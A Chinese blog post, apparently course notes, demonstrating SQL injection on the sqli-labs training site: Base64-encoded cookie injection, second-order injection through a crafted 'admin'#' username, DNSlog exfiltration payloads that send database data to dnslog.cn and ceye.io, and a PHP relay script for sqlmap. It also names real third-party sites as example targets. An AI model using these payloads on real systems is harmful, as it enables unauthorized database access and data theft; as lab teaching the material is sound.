《小迪安全》第17天 SQL注入:二次注入,加解密注入,DNSlog注入

已于 2023-05-04 16:58:42 修改
阅读量320 收藏 1
点赞数 1
文章标签: 安全 sql 数据库 网络安全 web安全
于 2023-04-30 00:23:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56250796/article/details/130435777
版权

目录

案例演示

1. Sqlilabs/less-21: Cookie & 加解密注入

2. Sqlilabs/less-24: POST登陆框 & 二次注入

3. DNSlog注入

案例演示

1. Sqlilabs/less-21: Cookie & 加解密注入

 尝试登陆 admin admin,抓包:

GET /Less-21/index.php HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90"
sec-ch-ua-mobile: ?0
Referer: http://127.0.0.1/Less-21/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: uname=YWRtaW4%3D
Connection: close

'%3D' 在URL编码中是 ‘=’。

BurpSuite 有解码插件,把 %3D 换成 号后选择Decode as Base64: 

发送语句看页面回显结果: 

实际情况中需要测试注入点,本题白盒测试默认已知为Cookie注入,注入点为 uname。有编码的情况下需要对注入语句进行对应编码。

把注入语句进行Base64编码后在Repeater内拼接到Cookie字段进行发送查看返回页面:

Cookie: uname=admin' and 1=1
Cookie: uname=YWRtaW4nIGFuZCAxPTE=

获取数据库名称,注入语句:

Cookie: uname=admin' or updatexml(1,concat(0x7e,(database())),0) or '
Cookie: uname=YWRtaW4nIG9yIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLChkYXRhYmFzZSgpKSksMCkgb3IgJw==

后续猜版本、猜表、猜列、……常规操作。

真实网站Base64加密实例:谷歌搜索 inurl:?id=MQ==

https://chm.iiserb.ac.in/faculty_ profile.php?id=MQ==&lname=YW5rdXJn

这样的网站如果有注入点,靠单纯拼接 and 1=1 是测试不出的。需要拼接注入语句再整体进行相应的编码/加密才能被后端解密、接受数据、进行处理。

2. Sqlilabs/less-24: POST登陆框 & 二次注入

二次注入是指已存储(数据库、文件)的用户输入被读取后再次进入到 SQL 查询语句中导致的注入。
二次注入比普通sql注入利用更加困难,利用门槛更高。普通注入数据直接进入到 SQL 查询中,而二次注入则是输入数据经处理后存储,取出后,再次进入到 SQL 查询。

二次注入一般用于代码审计、白盒测试中,黑盒测试一般无法通过手工测试找到注入点,就算找到注入也没办法攻击。

以 Sqlilabs/less-24 为例。

二次注入一般发生在这种有登陆、注册、忘记密码功能的应用场景。 

以 admin admin 登陆:

POST /Less-24/login.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 52
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/Less-24/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=olepm3lahqehrcd4l7fhn3ttk4
Connection: close

login_user=admin&login_password=admin&mysubmit=Login
GET /Less-24/logged-in.php HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90"
sec-ch-ua-mobile: ?0
Referer: http://127.0.0.1/Less-24/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Auth=1; PHPSESSID=olepm3lahqehrcd4l7fhn3ttk4
Connection: close
mysql> use security; 
Database changed

mysql> show tables;
+--------------------+
| Tables_in_security |
+--------------------+
| emails             |
| referers           |
| uagents            |
| users              |
+--------------------+
4 rows in set (0.01 sec)

mysql> select * from users;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
+----+----------+------------+
13 rows in set (0.00 sec)

注册:用户名 admin'# 密码123456

POST /Less-24/login_create.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 71
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/Less-24/new_user.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=olepm3lahqehrcd4l7fhn3ttk4
Connection: close

username=admin%27%23&password=123456&re_password=123456&submit=Register

mysql> select * from users;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
| 15 | admin'#  | 123456     |
+----+----------+------------+
14 rows in set (0.01 sec)

修改密码为 xxxxxx,按理说变动的应该是 admin'# 的密码,但 admin 的密码被修改了。

mysql> select * from users;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | xxxxxx     |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
| 15 | admin'#  | 123456     |
+----+----------+------------+
14 rows in set (0.01 sec)

源码中有关密码更新的语句为:

if($pass==$re_pass)
	{	
		$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
		$res = mysql_query($sql) or die('You tried to be smart, Try harder!!!! :( ');
		$row = mysql_affected_rows();
		echo '<font size="3" color="#FFFF00">';
		echo '<center>';
		if($row==1)
		{
			echo "Password successfully updated";
	
		}

新创建的用户名 admin'# 拼接到 UPDATE 语句并执行,形成二次注入。

UPDATE users SET PASSWORD='$pass' where username='admin'#' and password='$curr_pass'

同理,新创建的用户名(二次注入的药引子)可以为任何注入语句。比如前一讲提到的各种报错注入、函数结合注入等。

当然实战会存在各种长度限制:

  • 前端长度限制(如HTML长度限制)是可以修改网页信息、拦截数据包绕过的。
  • 后端长度限制,具体问题具体讨论。
  • sql语句也做了长度限制的话没办法了。

二次注入很难通过工具或人工探测到,普遍产生在代码审计中。

网上可以搜到的二次注入漏洞都是白盒测试,有源码的情况下挖出的漏洞。

3. DNSlog注入

还是以 sqli-labs/Less-9 为例。

参考 CEYE - Monitor service for security testing

注册成功后会给一个 Identifier 和 API Token,目前主要用 Identifier 即可。

DNSlog注入也称为dns带外查询,可以通过查询相应的dns解析记录来获取想要的数据。

在无法通过联合查询直接获取数据时,只能通过盲注一步步的获取数据,手工测试需要花费大量的时间,使用sqlmap等工具有很大的几率被封IP。

DNSlog注入属于Mysql注入,在MySQL中有系统属性,secure_file_priv特性,有三种状态:

mysql> show variables like'%secure%';
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_auth      | OFF   |
| secure_file_priv |       |
+------------------+-------+
2 rows in set (0.03 sec)
secure_file_priv
    null:表示不允许导入导出
    指定文件夹时:表示mysql的导入导出只能发生在指定的文件夹
    没有设置:表示没有任何限制

load_file() 函数读取一个文件并将其内容作为字符串返回。该函数不仅能加载本地文件,同时也能对URL发起请求。使用 load_file() 函数需要root权限,并且 secure_file_priv 需要为空。并且服务器要为 Windows 操作系统。

注入语句:

# 查询当前用户名
?id=1' and (select load_file(concat('\\\\',(select hex(user())),'.682y4b.dnslog.cn/abc'))) --+

# 查看当前数据库名
?id=1' and (select load_file(concat('\\\\',(select database()),'.682y4b.dnslog.cn/abc'))) --+

select * from users where id=1 and if((select load_file(concat('\\\\',(select version()),'.73024r.ceye.io\\abc'))),1,0);


'\'在sql语句中要转义,"\\\\"转义后变成"\\"
\\root.fqg2xn.dnslog.cn

通过 concat() 函数将查询结果和api的地址进行拼接,形成一个四级域名,然后通过load_file()函数将域名进行dns解析,然后就可以在dns平台进行查看了。

查看DNS解析日志顺利查询到数据库版本。

手工操作比较复杂,实用工具: ​​​​​​GitHub - ADOOO/DnslogSqlinj

需要 Python2 环境,在 config.py 中配置好自己在ceye.io的 APItoken 和 DNSurl。用法:

dnslogSql.py -u "http://127.0.0.1/sqli-labs/less-9/?id=1' and ({})--+"

4. 加解密/编码注入

某些工具有集成的现成插件,如sqlmap的base64插件:

sqlmap -u "http://127.0.0.1/sqli-labs/less-9/?id=1" --tamper base64encode.py -dbs

sqlmap有许多强力插件,在目录 sqlmap/tamper 下。使用方法:--tamper "指定使用脚本"

如果现成脚本无法满足需求,需要使用者有二次开发的能力。

假设没有 base64 脚本插件,又不想手工注入,接下来我们写一个脚本完成所需功能:

<?php
$url='http://www.likemedical.com/About.php?ID=MQ==';
$result=file_get_contents($url);
echo $result;
?>

访问 127.0.0.1:8080/test.php :

相当于把网页拖了过来。

<?php
$url='http://www.likemedical.com/About.php?ID=MQ==';
$payload=base64_encode($_GET['x']);
file_get_contents($url . $payload);
?>

再用sqlmap:

sqlmap -u "http://127.0.0.1:8080/test.php?x=" -v 3

注入语句就全部写到x后面。脚本接收到x,经过base64加密再拼接。达到中转的目的。

B站小安全笔记第十七-SQL注入二次加解密,dns等注入
m0_61530426的博客
07-29 855
B站小安全笔记
21-40关
bsaikfhgihwi的博客
02-08 405
第二十一关 本关和less-20相似,只是cookie的uname值经过base64编码了。 登录后页面: 圈出来的地方显然是base64加密过的,解码得到:admin,就是刚才登陆的uname,所以猜测:本题在cookie处加密了字符串, 查看php文件确实如此,所以只需要上传paylaod的时候base64加密一下就可以了。 先抓包看一下: hadow_10,text_aHR0cHM6Ly9...
安全学习笔记--第17web漏洞--SQL注入二次注入加解密DNSlog注入
zr1213159840的博客
12-15 591
加解密二次DNSlog注入 注入原理,演示案例,实际应用(中转注入加解密:有些页面不会直接显示明文的信息,因此需要注入的时候,注入的语句需要先加密 二次注入二次注入是无法通过扫描或者黑盒测试来进行挖掘的。一般需要进行源码审计 DNSlog:解决盲注不能回显数据,效率低的问题 load_file和DNSlog进行结合,当load_file是能对外进行读取的,请求一个网站的时候,会通过DNSlog传回相关的信息。DNSlog注入必须要有最高权限。 演示案例 sqlilabs-less21-cooki
渗透测试学习笔记(十七)WEB漏洞-二次加解密,DNS等注入
萧丶的博客
02-06 979
1. 加解密注入 get或者post的参数采用了base64等加密方式将数据进行加密,在通过参数传递给服务器,eg:www.xxx.com/index.php?id=MQ== 加密部分:MQ== 解密结果:1 案例:sqlilabs-less21 burp抓包 forward,可以看到uname=YWRtaW4%3D %3D 为 = ,base解密为admin 将uname的值改为注入语句: admin' or updatexml(1,concat(0x7e,(database())),0)
SqliLabs Less21-22
qq_45785324的博客
07-15 545
SqliLabs Less21 Less22
17WEB漏洞-SQL注入二次,加解密,DNS等注入1
08-03
本文将深入探讨二次注入加解密技术以及DNSlog注入的概念、原理,并通过具体案例和实际应用来阐述这些技术如何被利用。 **SQL注入**是攻击者通过在Web应用程序的输入字段中插入恶意SQL代码,从而控制或篡改数据库...
安全17 web漏洞,SQL注入二次加解密,DNS等注入
qq_46116117的博客
12-27 442
17 web漏洞,SQL注入二次加解密,DNS等注入 加解密注入 知识点 即get或者post的参数采用了base64等加密方式将数据进行加密,在通过参数传递给服务器 如果想要对这个网站,再ID处进行注入 则需要先编写sql注入语句,然后在进行base64编码 案例:sql-libs–21 正常页面 一看就是cookie注入 抓个包看看 YWRtaW4%3D %3D为url编码的= 尝试用base64解码看看 我们可以尝试在这里进行注入注入sql语句经过base64加密之后放入cooki
常见的网络安全面试题目(个人总结)
weixin_53139899的博客
03-20 4837
本文总结一些常见的安全知识,供大家学习参考!
自用护w面试题
Zephyr_Misaka的博客
06-01 1163
21-FTP 看是否存在匿名访问22-SSH 看是否存在弱口令25-SMTP80-HTTP 常见web漏洞443-HTTPS openSSl心脏出血漏洞445-smb ms08-067、 ms17-0101433-mssql 弱口令1521-oracle, 弱口令3306-mysql 数据库的默认端口3389-windows远程桌面 弱口令7001-weblogic的默认端口 8080-tomcat漏洞应用层:为应用程序提供网络服务表示层:数据格式化、加密、解密会话层:建立、管理和维护会话连接传输层:建立
web漏洞-渗透测试-加密解密注入-二次注入-DNSlog带外注入-中转注入-附SQLi-LABS靶场操作示例
ran的博客
01-18 814
加解密注入就是比常规注入多了一步,需要对网站加密方式进行还原,在注入过程中,所有的注入语句要按照网站的加密方式进行加密后再进行注入。DNS(Domain Name System,域名系统),因特网上作为域名和IP地址相互映射的一个分布式数据库,能够使用户更方便的访问互联网,而不用去记住能够被机器直接读取的IP数串。通过主机名,最终得到该主机名对应的IP地址的过程叫做域名解析(或主机名解析)。sqlmap工具;BurpSuit抓包;SQLi-LABS靶场;
CTF 加密 解密 SQL注入 BASE64
03-19
CTF 加密 解密 SQL注入 BASE64
SQL Injection | SQL 注入 —— 加解密注入
Blue17 の 小窝
10-17 1120
字段的值,其实就是 Base64 编码后的用户名,既然如此,接下来,我们就开始尝试对 Cookie 进行加解密注入(Base64 只能算是一种编码,并不算加密,不过流程一致)。加解密注入漏洞的利用流程和普通的 SQL 注入利用流程一致,只不过多了一步,需要将我们构造的 Payload 按照服务端的加密规则进行加密后再传递,仅此而已。Base64 使用一个包含 64 个字符的集合,这些字符由 A-Z,a-z,0-9,+,/,以及一个填充字符 = 号组成。虽然没能爆出数据库,但起码证明了,上述的方法可行。
网络安全】对SQL注入的总结笔记
最新发布
2402_87970928的博客
01-02 1577
二次注入的原理,在第一次进行数据库插入数据的时候,使用了 addslashes 、get_magic_quotes_gpc、mysql_escape_string、mysql_real_escape_string等函数对其中的特殊字符进行了转义,但是addslashes有一个特点就是虽然参数在过滤后会添加 “\” 进行转义,但是“\”并不会插入到数据库中,在写入数据库的时候还是保留了原来的数据。在渗透测试中,当发现SQL注入漏洞时,对于不同的数据库,如Oracle,需要特定的技术和方法来进行利用。
06_SQL注入_二次注入&加密解密
qq_42171569的博客
05-18 1188
06_SQL注入_加密注入&二次注入 1.加密注入 SQL注入的思路是用户用自定义语句和原本的SQL语句拼接,但有时开发者会对获取到的数据进行加密,那么对于渗透测试者而言如果想要在这样的情况下进行操作,则需要将自己的注入语句进行相同的加密处理后与原本的语句进行拼接。这种类型的大体思路和先前的思路整体无异,唯一的区别就是需要测试者先写好payload,再进行加密,随后将数据包放出进行注入尝试。 加密类型的注入SQLi-Labs中得到了复现,实验如下: 【靶场】SQLi-Labs less-21 【
单片机Base64 C语言加密
ZenNaiHeQiao的专栏
05-18 2251
Authorization: Basic YWRtaW46YWRtaW4= 为登录的帐号密码。 使用 Base64 解密开查看内容:admin:admin 然后用软件将字典中的密码与“admin:”进行组合,然后进行 base64 加密,进行破解。 下面是加密算法: #include #include #define HTTP_DATA_MAX_LEN 2048 #define
SQLI LABS Basic Part(1-22) WriteUp
weixin_34085658的博客
03-06 174
好久没有专门练SQL注入了,正好刷一遍SQLI LABS,复习巩固一波~ 环境: phpStudy(之前一直用自己搭的AMP,下了这个之后才发现这个更方便,可以切换不同版本的PHP,没装的小伙伴赶紧试一试) Less-1: 提示参数是id,值为数字。 先测试是字符型还是字符串型: ?id=1 and 1=2--%20 ?id=1' and 1=2--%20 结果证明是字符串型。 然后一系...
安恒月赛WriteUp-2018.12
BlusKing
12-22 3055
安恒月赛WriteUp2018-12月   WEB1-easy: web1反序列化   一打开就显示了源代码:  &lt;?php   @error_reporting(1); include 'flag.php'; class baby {        public $file;     function __toString()           {      ...
密码重置
weixin_30674525的博客
05-29 403
http://nctf.nuptzj.cn/web13/index.php?user1=Y3RmdXNlcg== Y3RmdXNlcg==一看就是base64 解密ctfuser== 然后查看元代码 vcode user newpass 我的账号应该是管理员账号admin 编码YWRtaW4=%3d%3d 然后注入 flag is:nctf{reset_...
17网络安全:cookie注入二次注入DNSlog注入、中转注入、堆叠注入的原理及注入过程
02-26 3562
原理、靶场、步骤、注入
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值